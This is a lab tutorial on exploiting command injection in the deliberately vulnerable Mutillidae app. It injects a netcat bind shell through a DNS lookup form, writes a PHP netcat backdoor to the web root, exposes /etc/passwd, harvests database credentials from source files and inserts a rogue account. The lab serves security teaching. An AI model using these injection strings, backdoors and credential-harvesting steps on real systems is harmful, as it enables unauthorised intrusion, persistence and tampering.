Bài Hướng Dẫn Mutillidae : Lesson 3 - Command Injection Netcat Session

{ Command Injection Netcat Session }

---

Section 0. Background Information

• What Mutillidae?
  • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
• What is Command Injection?
  • Command Injection occurs when an attacker is able to run operating system commands or serverside scripts from the web application.  This vulnerability potential occurs when a web application allows you to commonly do a nslookup, whois, ping, traceroute and more from their webpage.  You can test for the vulnerability by using a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is append to the end of the expected input (eg., www.cnn.com) followed by a command (eg., cat /etc/passwd).
• What is netcat?
  • Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities. Netcat is often referred to as a "Swiss-army knife for TCP/IP". Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.
• Pre-Requisite Lab
  1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedor
     • Note: Remote database access has been turned to provide an additional vulnerability.
  2. BackTrack: Lesson 1: Installing BackTrack 5 
     • Note: This is not absolutely necessary, but if you are a computer security student or professional, you should have a BackTrack VM.
• Lab Notes
  • In this lab we will do the following:
    1. Execute netcat using the command injection/execution vulnerability.
    2. Create a netcat backdoor outside of the command injection vulnerability.
    3. Conduct PHP Reconnaissance
    4. Conduct Database Reconnaissance
    5. Add a user to the nowasp.accounts table.

• Legal Disclaimer - không thực hành trên các mục tiêu mà bạn không có thẩm quyền

Section 1. Configure Fedora14 Virtual Machine Settings

1. Open Your VMware Player
   • Instructions:
     1. On Your Host Computer, Go To
     2. Start --> All Program --> VMWare --> VMWare Player
2. Edit Fedora Mutillidae Virtual Machine Settings
   • Instructions:
     1. Highlight fedora14
     2. Click Edit virtual machine settings
   • 
3. Edit Network Adapter
• Instructions:
  1. Highlight Network Adapter
  2. Select Bridged
  3. Click the OK Button
• 

Section 2. Login to Fedora14 - Mutillidae

1. Start Fedora14 VM Instance
   • Instructions:
     1. Start Up VMWare Player
     2. Select Fedora14 - Mutillidae
     3. Play virtual machine
   • 
2. Login to Fedora14 - Mutillidae
   • Instructions:
     1. Login: student
     2. Password: <whatever you set it to>.
   • 

Section 3. Open Console Terminal and Retrieve IP Address

1. Start a Terminal Console
   • Instructions:
     1. Applications --> Terminal
   • 
2. Switch user to root
   • Instructions:
     1. su - root
     2. <Whatever you set the root password to>
   • 
3. Get IP Address
   • Instructions:
     1. ifconfig -a
   • Notes (FYI):
     • As indicated below, my IP address is 192.168.1.111.
     • Please record your IP address.
   • 

Section 4. Configure BackTrack Virtual Machine Settings

1. Edit the BackTrack5R1 VM
   • Instructions:
     1. Select BackTrack5R1 VM
     2. Click Edit virtual machine settings
   • 
2. Edit Virtual Machine Settings
   • Instructions:
     1. Click on Network Adapter
     2. Click on the Bridged Radio button
     3. Click on the OK Button
   • 

Section 5. Play and Login to BackTrack

1. Play the BackTrack5R1 VM
   • Instructions:
     1. Click on the BackTrack5R1 VM
     2. Click on Play virtual machine
   • 
2. Login to BackTrack
   • Instructions:
     1. Login: root
     2. Password: toor or <whatever you changed it to>.
   • 
3. Bring up the GNOME
   • Instructions:
     1. Type startx
   • 

Section 6. Open Console Terminal and Retrieve IP Address

1. On BackTrack, Start up a terminal window
   • Instructions:
     1. Click on the Terminal Window
   • 
2. Obtain the IP Address
   • Instructions:
     1. ifconfig -a
   • Note(FYI):
     • My IP address 192.168.1.109.
     • In your case, it will probably be different.
     • This is the machine that will be use to attack the victim machine (Metasploitable).
   • 

Section 7. Start Web Browser Session to Mutillidae

1. On BackTrack, Open Firefox
   • Instructions:
     1. Click on the Firefox Icon
   • Notes (FYI):
     • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
   • 
2. Open Mutillidae
   • Notes (FYI):
     • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
   • Instructions:
     1. http://192.168.1.111/mutillidae
   • 

Section 8. Netcat Command Execution

1. Go to DNS Lookup
   • Instructions:
     1. OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
   • 
    
2. Execute Netcat  
   • Notes(FYI):
     • Below we are going to append NetCat to the basic nslookup test.  :)
   • Instructions:
     1. www.cnn.com;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
        • Make a FIFO named pipe.
        • Pipes allow separate processes to communicate without having been designed explicitly to work together.
        • This will allow two processes to connect to netcat.
        • nc -l 4444, tells netcat to listen and allow connections on port 4444.
     2. Click Lookup DNS
     3. Continue to next step
        • Note: No results will be displayed to this webpage, please continue to next step.
   • 
    
3. Verifying Results
   • Note(FYI):
     1. Notice in the upper left tab, there is a connection pin-wheel that constantly spins.
     2. Notice in the lower left corner, the status bar displays the message transferring data.
     3. Both of these messages are a good signs that netcat is running and listening for a connection.
   • Instructions:
     1. Continue to next section.
   • 

Section 9. Connecting to Netcat

1. Connect to Netcat
   • Notes(FYI):
     • Implement the following instructions on the BackTrack VM
     • Replace 192.168.1.111 with the Fedora(Mutillidae) IP Address obtained from (Section 3, Step 3).
   • Instructions:
     1. nc 192.168.1.111 4444
        • Use BackTrack to Connect to the Mutillidae Netcat session on port 4444
     2. hostname
        • This is server hostname that hosts DVWA.
     3. whoami
        • Print the effective UserID.
        • Ie., Who am I connected as.
   • 
2. Directory and Username Reconnaissance
   • Notes (FYI):
     • We already know that we connected as the apache user, but we also want to know what is our current working directory.
     • Also, we want to know if we have the ability to create a file within the current working directory.   
   • Instructions:
     1. pwd
        • Print the current working directory
     2. uname -a
        • Print system information (eg., Operating System & Version, Kernel, etc).
     3. cat /etc/passwd > passwd.txt
        • Create a passwd.txt file located in /var/www/html/mutillidae
     4. ls -l $PWD/passwd.txt
        • List the passwd.txt file.
   • 

Section 10. Viewing /etc/passwd

1. Open New FireFox Tab
   • Notes (FYI):
     • Perform the following instructions on BackTrack's Firefox.
   • Instructions:
     1. Click on the Green Plus to create a new tab
   • 
2. View /etc/passwd
   • Notes (FYI):
     • Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtained in (Section 3, Step 3).
     • It nice to be able to view the password file, but the real feat was to be able to create a file and view it on the apache webserver.  (Prepare for some black magic).
   • Instructions:
     1. Place the following link in the Address Bar.
        • http://192.168.1.111/mutillidae/passwd.txt
   • 

Section 11. Create PHP Backdoor

1. Discover the Database Engine using the /etc/passwd file
   • Notes (FYI):
     • Perform the following instructions using your previous BackTrack Terminal Netcat session.
     • We now we can create a file on the Apache Webserver in the /var/www/html/mutillidae directory.
     • Let's create a php script that will serve as a netcat backdoor without having to execute netcat using the nslookup command execution.  
   • Instructions:
     1. echo "<?php system(\"mkfifo /tmp/pipe2;sh /tmp/pipe2 | nc -l 3333 > /tmp/pipe2\"); ?>" > nc_connect.php
     2. ls -l $PWD/nc_connect.php
     3. chmod 700 nc_connect.php
     4. ls -l $PWD/nc_connect.php
     5. cat nc_connect.php
   • 
2. Execute nc_connect.php
   • Notes (FYI):
     • Perform the next steps in BackTrack's second Firefox tab.
     • Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtain in (Section 3, Step 3).
     • Use the second Firefox tab that you previously viewed the /etc/passwd file with to execute the nc_connect.php script.  
   • Instructions:
     1. Place the following link in the Address Bar.
        • http://192.168.1.111/mutillidae/nc_connect.php
     2. Continue to Next Step
   • 
3. On BackTrack, Start up a "another" terminal window
   • Instructions:
     1. Click on the Terminal Window
   • 
4. Viewing your netcat sessions
   • Notes (FYI):
     • This terminal window will be used to connect to the nc_config.php netcat session.
     • Replace 192.168.1.111 with the Fedora (Mutillidae) IP Address obtain in (Section 3, Step 3).
   • Instructions:
     1. nc 192.168.1.111 3333
     2. whoami
     3. ps -eaf | egrep '(3333|4444)'
   • 

Section 10. PHP Script Interrogation

1. List all php scripts
   • Notes (FYI):
     • Perform the next steps in the nc_config.php netcat terminal.
     • Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
     • But, first, let's count all the php scripts and include files.
   • Instructions:
     1. pwd
        • This show the current working directory to be /var/www/html/mutillidae.
     2. find * -name "*.php" | wc -l
        • Count the number of php script located in the current working directory.
     3. find * -name "*.inc" | wc -l
        • Count the number of php include files located in the current working directory.
   • 
2. List all php scripts
   • Notes (FYI):
     • Now we are going to search each include file (*.inc) for the string "password" AND the strings "db" OR "database".
   • Instructions:
     1. find * -name "*.inc" | xargs grep -i password | egrep -i '(db|database)'
        • find * -name "*.inc", find all files with the *.inc extension in the current working directory.
        • xargs, build and execute command lines from standard input
        • grep -i password, ignore case and search for the string "password".
        • egrep -i '(db|database)', ignore case and search for the strings "db" OR "database".
   • 
3. Search php scripts for the string password
   • Notes (FYI):
     • Now we will search the 900+ php scripts for the string "password" AND the strings ("db" OR "database") AND the string "=".
     • I will use head -8 to show only the first 8 lines, but feel free to remove the "| head -8" to see all the results.
     • The name of the script that contains the database password is MySQLHandler.php.
   • Instructions:
     1. find * -name "*.php" | xargs grep -i password | egrep -i '(db|database)' | grep "=" | head -8
   • 
4. Search MySQLHandler.php for authentication information
   • Notes (FYI):
     • Below I will search the MySQLHandler.php script for the strings (password OR username OR database) and the string "=".
     • Notice the username (root), password (samurai), and database (nowasp) is listed in the results.
   • Instructions:
     1. find * -name "MySQLHandler.php" | xargs egrep -i '(password|username|database)' | grep "=" | head -10
   • 

Section 11. Database Interrogation

1. Basic Database Interrogation
   • Notes (FYI):
     • Perform the next steps in the nc_config.php netcat terminal.
     • The below command shows you how to execute database commands in the netcat session.
     • show databases, allows you to view all databases.
     • use nowasp; show tables, means use the nowasp database and show its's tables.
   • Instructions:
     1. echo "show databases;" | mysql -uroot -psamurai
     2. echo "use nowasp; show tables;" | mysql -uroot -psamurai
   • 
2. Interrogate the accounts table
   • Notes (FYI):
     • The below command shows you how to view the column fields of the accounts tables.
     • In addition, you will run a basic select statement to view the contents of the accounts table.
   • Instructions:
     1. echo "use nowasp; desc accounts;" | mysql -uroot -psamurai
     2. echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
   • 
3. Create a new user in the accounts table
   • Notes (FYI):
     • The below command shows you how to create a new username using the MySQL insert command.
     • Pay attention to the last record of your select statement results.
   • Instructions:
     1. echo "insert into nowasp.accounts values (null,'hacker33','p4sSw0rd!','H4ck 4 fo0d','TRUE');" | mysql -uroot -psamurai
     2. echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
   • 

Section 12. Proof of Lab

1. Proof of Lab
   • Notes (FYI):
     • Perform the next steps in the nc_config.php netcat terminal
     • Use nc_config.php netcat session for the below directions.
   • Instructions:
     1. echo "select * from nowasp.accounts where username = 'hacker33';" | mysql -uroot -psamurai
     2. netstat -nao | egrep '(3333|4444)'
     3. date
     4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
   • Proof of Lab Instructions:
     1. Do a PrtScn
     2. Paste into a word document
     3. Upload to website www.antoanthongtin.edu.vn
   • 

Trong: Mutillidae,Onsite Lab